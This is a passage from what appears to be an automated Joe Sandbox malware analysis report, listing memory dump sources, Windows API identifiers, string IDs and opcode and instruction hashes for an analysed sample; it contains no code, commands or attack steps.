                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: IsWow64Process$kernel32
                  • API String ID: 1646373207-3789238822
                  • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                  • Instruction ID: 71e3d38ea60f4c9d78a9a6672dbd210c088d42e1785af9caa13b55ac1189f86e
                  • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                  • Instruction Fuzzy Hash: FBE09A70221E91A2EE599B55EC893256360FFA878CF4C2220D96B0626CEF2DC18AC700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                  • API String ID: 1646373207-736604160
                  • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                  • Instruction ID: 4c9e97ab836eab1f1805a9319a6c0997b236b5019e0b253e2ae384522d1ea684
                  • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                  • Instruction Fuzzy Hash: 97D05B30751E95A1FD1D5791BC4D2546350BF79B4CF4C1211CC2D06358DE2DC18BC310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                  • API String ID: 1646373207-3900151262
                  • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                  • Instruction ID: 713d727f73dba9209cedf39e06c6d4fc8b8bf0f8dbde6b8e9311e6c7210a6e69
                  • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                  • Instruction Fuzzy Hash: 27D05B30751ED561FD1D9791BC4E25413507F69B4DF4C1110C82906358DE2DC18BC310
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snprintf
                  • String ID:
                  • API String ID: 3512837008-0
                  • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                  • Instruction ID: 42c9775346c1c8abd1620e2c6a91e60cb96ad85b21314eff1893eb701f00a179
                  • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                  • Instruction Fuzzy Hash: 8691E430618E5C8FEB45EF19D8D9BBA73E5FBA4304F004129E446C31A6DE39D946CB92
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                  • String ID:
                  • API String ID: 2026495703-0
                  • Opcode ID: b352101c7262c8bcb4a5e96376bd10b91777e0dce9561e268234f3b9efdf5141
                  • Instruction ID: 9f9fcf410352fda836da5846df0638becbd253c56dee392f7dcab9d66cb5604b
                  • Opcode Fuzzy Hash: b352101c7262c8bcb4a5e96376bd10b91777e0dce9561e268234f3b9efdf5141
                  • Instruction Fuzzy Hash: BB116330A1DF184FE7A8EB6CA49936576D1F79C710F10495EE08EC32ABDA34AC4247D2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 71253800d1795a9d3461c9a2abaf0dff8d7b3023a836dbffc4b560ae3a195706
                  • Instruction ID: 943284425a3c6784de83b27e36900f8dd59cc1555d9b62b0efe116523e549cd3
                  • Opcode Fuzzy Hash: 71253800d1795a9d3461c9a2abaf0dff8d7b3023a836dbffc4b560ae3a195706
                  • Instruction Fuzzy Hash: C6919872E09A6286E76A8F29C50477A6A91BB08B94F598131CF0DB77DCDF3CE845C740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 634798775-0
                  • Opcode ID: 34e7f92ebff520e6a17a4e985317f9f17b8bd586bad3667c73d28a98cf0395a5
                  • Instruction ID: fbc49c1ee4ec7ede00be569b51e219c3c5f2fe11e38783c5caed57c0b0917af9
                  • Opcode Fuzzy Hash: 34e7f92ebff520e6a17a4e985317f9f17b8bd586bad3667c73d28a98cf0395a5
                  • Instruction Fuzzy Hash: A7512970218F1D4BE6686A6D54FE33572D1E798314F24422ED45AC31FEEA62CC5283D2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                  • Instruction ID: 253cc2fd112bf36f96920cebdfb1cc19a9155254a467ecde90e3d6c6232591b8
                  • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                  • Instruction Fuzzy Hash: 7C618035241EA0C6E75CAB29DD8D76C33E0FB98B9CF1C4129E9094B7A9C73AC4428B40
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: clock
                  • String ID:
                  • API String ID: 3195780754-0
                  • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                  • Instruction ID: a06859aca2d036b3f0423bd05d74b3bc83845bb964877012f079e9efb5aa6227
                  • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                  • Instruction Fuzzy Hash: 3321353184CB2D0FEB68E99D68CA337B6D1F794350F11422DE8CA83147E5529C4243E2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: Byte$CharLeadMultiWide
                  • String ID:
                  • API String ID: 2561704868-0
                  • Opcode ID: 60955b7da004b012cd6c20307c8efa49db5495c7d84d8066373e77440e57a3b0
                  • Instruction ID: b9d14c5e75fac2488914053634dbbf3bbe31e7cd11ac96f99b4455579a61a466
                  • Opcode Fuzzy Hash: 60955b7da004b012cd6c20307c8efa49db5495c7d84d8066373e77440e57a3b0
                  • Instruction Fuzzy Hash: F231767260CA81C6E3A18F25F40036A7BA0FB99784F588135DA98F7BE9DF3DD5458B00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                  • String ID:
                  • API String ID: 2495333179-0
                  • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                  • Instruction ID: 86e3ac74889308d900550de4c6e907aa9042c5308e95725a9c6bad340e8559df
                  • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                  • Instruction Fuzzy Hash: 0531A436200EA082EB58FF22AD4826977A5FFC8B9CF0D8514DE565769DDB39C881C344
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Timestrtok$FileSystem_getptd_time64malloc
                  • String ID:
                  • API String ID: 460628555-0
                  • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                  • Instruction ID: 89726acc35ff12dbd1007ab30a8407646ddb140ac0f78309b689ff95250ea133
                  • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                  • Instruction Fuzzy Hash: 3921E4B6600FE481EB18EF95A88869937A8FB84BECF1A4255EF1A47789CB31C441C740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                  • String ID:
                  • API String ID: 1991439119-0
                  • Opcode ID: 4030f444e10e83babf63ca456711778ffaca7bb986e35c3fe88b540d1c4421cc
                  • Instruction ID: 3c2bb226c3e22e4d5ec84399a1f5767edf1e8dd29a03400a8d0de0852b8700a3
                  • Opcode Fuzzy Hash: 4030f444e10e83babf63ca456711778ffaca7bb986e35c3fe88b540d1c4421cc
                  • Instruction Fuzzy Hash: 8C117331210E1D8AFB26FF24ECED7F633A5F754308F4445299502C60F9EE7A9A448764
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                  • String ID:
                  • API String ID: 4151157258-0
                  • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                  • Instruction ID: 741615465a9db3208ea4e3db68f5bfafc9c27590ea8ea54e4a53068ff03258b7
                  • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                  • Instruction Fuzzy Hash: 3121D272208AF041EB785615985837DA6D0FB84BFCF1C412AEA960FAEDDA6EC4418710
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: clock
                  • String ID:
                  • API String ID: 3195780754-0
                  • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                  • Instruction ID: 8cf1751cad701d1d916265ee771d1a26b8a64d1c482a920a423d9c07403cc408
                  • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                  • Instruction Fuzzy Hash: E911E332604BF845E7B8DE766C8466BB6D0BF843ACF1D0135EF654365DE976C8818601
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$closesocketsend$accept
                  • String ID:
                  • API String ID: 47150829-0
                  • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                  • Instruction ID: ec204a7b5fbab41ff7a31354f3036192f177b9bed391b4f78bc3c3bf22e49cca
                  • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                  • Instruction Fuzzy Hash: 7F015235304DA081EB58AB36FD59B7D2361FB99FECF089215DE2607799CF2AC0818B40
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$NamedPeekPipeSleep
                  • String ID:
                  • API String ID: 1593283408-0
                  • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                  • Instruction ID: 07c1f51b499d82f7abc77e35b58d5f4898f109f5e443ee318e48c41aebf230bf
                  • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                  • Instruction Fuzzy Hash: A401A931614EA092F7249725FC4931AA7A1FFC978DF6C4120EB5942A6CEF3EC4C28705
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$NamedPeekPipeSleep
                  • String ID:
                  • API String ID: 1593283408-0
                  • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                  • Instruction ID: 09d2758f4c332664b6261358179ff85b3bb603e60fddc5476ccc78ac235d8c34
                  • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                  • Instruction Fuzzy Hash: 7E018632614EA193F7149B55FC4831AB761FBD979CF688620EB9542A7CDF3EC4818B04
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                  • String ID:
                  • API String ID: 1525665891-0
                  • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                  • Instruction ID: fd0cd107033aaadbab1477fe29fbb2eaaecf0fe16edd3984107d17f75b024c66
                  • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                  • Instruction Fuzzy Hash: 9FE04236610C9481EE18FBA2DCBA1681230BBD8F9CF1800659F1E4A2AA8E66C8958344
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                  • String ID: B
                  • API String ID: 1812809483-1255198513
                  • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                  • Instruction ID: 929def01a5c40e5facffe1a23a20d6fde506af4de4e142849cd90dd5b48fcc5c
                  • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                  • Instruction Fuzzy Hash: B111BF30228F0C8FD744EF1C948976AB2D2FBA8328F10476EA019C32A5CB74C985C782
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                  • String ID: B
                  • API String ID: 1812809483-1255198513
                  • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                  • Instruction ID: 4471a6f10a1ac3ae6889a9ad9db79795e6f7e859b8a5ef16d05125a36ba94b24
                  • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                  • Instruction Fuzzy Hash: 6B11A572610B9086EB249F56E8483997660FB98FFCF684325AF580BBD9CF38C140CB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-3474627141
                  • Opcode ID: f6fe61a779a87eb39abcfee344401f2a187891694e862ef8347c9b1371331ef3
                  • Instruction ID: 92b3f3a122bb109c5e3daefafa6a18d69d969bed2bf63c11a63a9603f789b584
                  • Opcode Fuzzy Hash: f6fe61a779a87eb39abcfee344401f2a187891694e862ef8347c9b1371331ef3
                  • Instruction Fuzzy Hash: B3015E63D1CF8482E6018F18D8401BA7331FBAE789F299325EA8D76569DF29E592C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4064033741
                  • Opcode ID: 87a7770db71728519d94f0787ec26e0744cbef0beaec10e93c49723dc7caa2ef
                  • Instruction ID: 756674d6d02b032279955e21aedc1e02d5d6e93d1f8188ad975a010eaa489f71
                  • Opcode Fuzzy Hash: 87a7770db71728519d94f0787ec26e0744cbef0beaec10e93c49723dc7caa2ef
                  • Instruction Fuzzy Hash: 73F06226C08E8882D2028F1CE4001BB7331FF4E788F285325EF8D7A169DF28E582C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
